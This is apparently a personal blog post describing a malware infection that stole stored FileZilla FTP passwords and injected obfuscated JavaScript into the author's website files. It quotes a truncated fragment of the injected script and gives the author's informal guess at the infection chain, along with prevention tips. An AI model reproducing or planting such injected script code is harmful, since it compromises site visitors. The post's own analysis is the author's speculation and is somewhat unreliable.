This story happen when I visit a website, http://pa-malangkab.go.id, when I visit it , nothing happen actually, a weird thing happen tomorrow.

In the morning, I turn on my notebook and suddenly a message appear, “Security Tools” already installed on my computer, I didn’t feel install that software recently, but I know it was a spy ware or malware  software, then I use Malwarebytes (http://www.malwarebytes.org/mbam.php) to clean my notebook, and it work great, the malware was successfully cleaned.

Accidentally I open my website work, and something bad happen, the website show nothing, I check the code and found some java script code injected to my PHP file. Then I think where the code came from ??

The java script code :

<script>/*LGPL*/ try{ window.onload = function(){var C1nse3sk8o41s = document.createElement(’s&c^$#r))i($p@&t^&’.repl

After some investigation, I found that the malware infected my notebook steal my FTP , I am using Filezilla FTP client for my FTP activity. The Filezilla FTP client store some recent FTP session on “Quick Connect” feature, there 6 recent FTP session that stole from my notebook :( After get informasion from web, I know that filezilla is targeted by virus or malware, they like stole the FTP password. So I am will not use Filezilla again !!!!

After couple hour after malware infection, ton of my website file infected by javascript code. As a precautionary measure I change all FTP password listed on “Quick Connect” on Filezilla, from 6 website, I only can save 1, the last 5 website injected by malware : (

The file that injected by javascript code are  (in my case):

  1. index.php
  2. index.html
  3. .js file
  4. file name that contain “home” & “main”

It was a lot job if manually remove the injected file, so I decide to find information how to remove injected javascript code. Finally I found a god man that write PHP code to remove javascript code ( Thanks alot :) ), you can download the virus/javascript removal at http://justcoded.com/article/gumblar-family-virus-removal-tool/

So how this virus come to your computer ??? Here my personal analyze :

  1. We visit some infected website with some virus java script code.
  2. Automatically it will run Java run time, then download a PDF file.
  3. The PDF file is a modified PDF file that was injected by some code / virus, and exploit your acrobat reader
  4. If your anti virus (My last AV is avast home edition) didn’t recognize the PDF file as virus, you will be infected.

The prevention :

  1. Update your Anti virus (I decide to change my anti virus to Avira (http://www.free-av.com/)  free edition and it recognize the PDF file virus well)
  2. Update your Acrobat Reader to latest version and disable the java script on your acrobat reader ( Edit – Preference – JavaScript – Un check  “Acrobat Java Script”
  3. Not using Filezilla, unless you can disable “Quick Connect” feature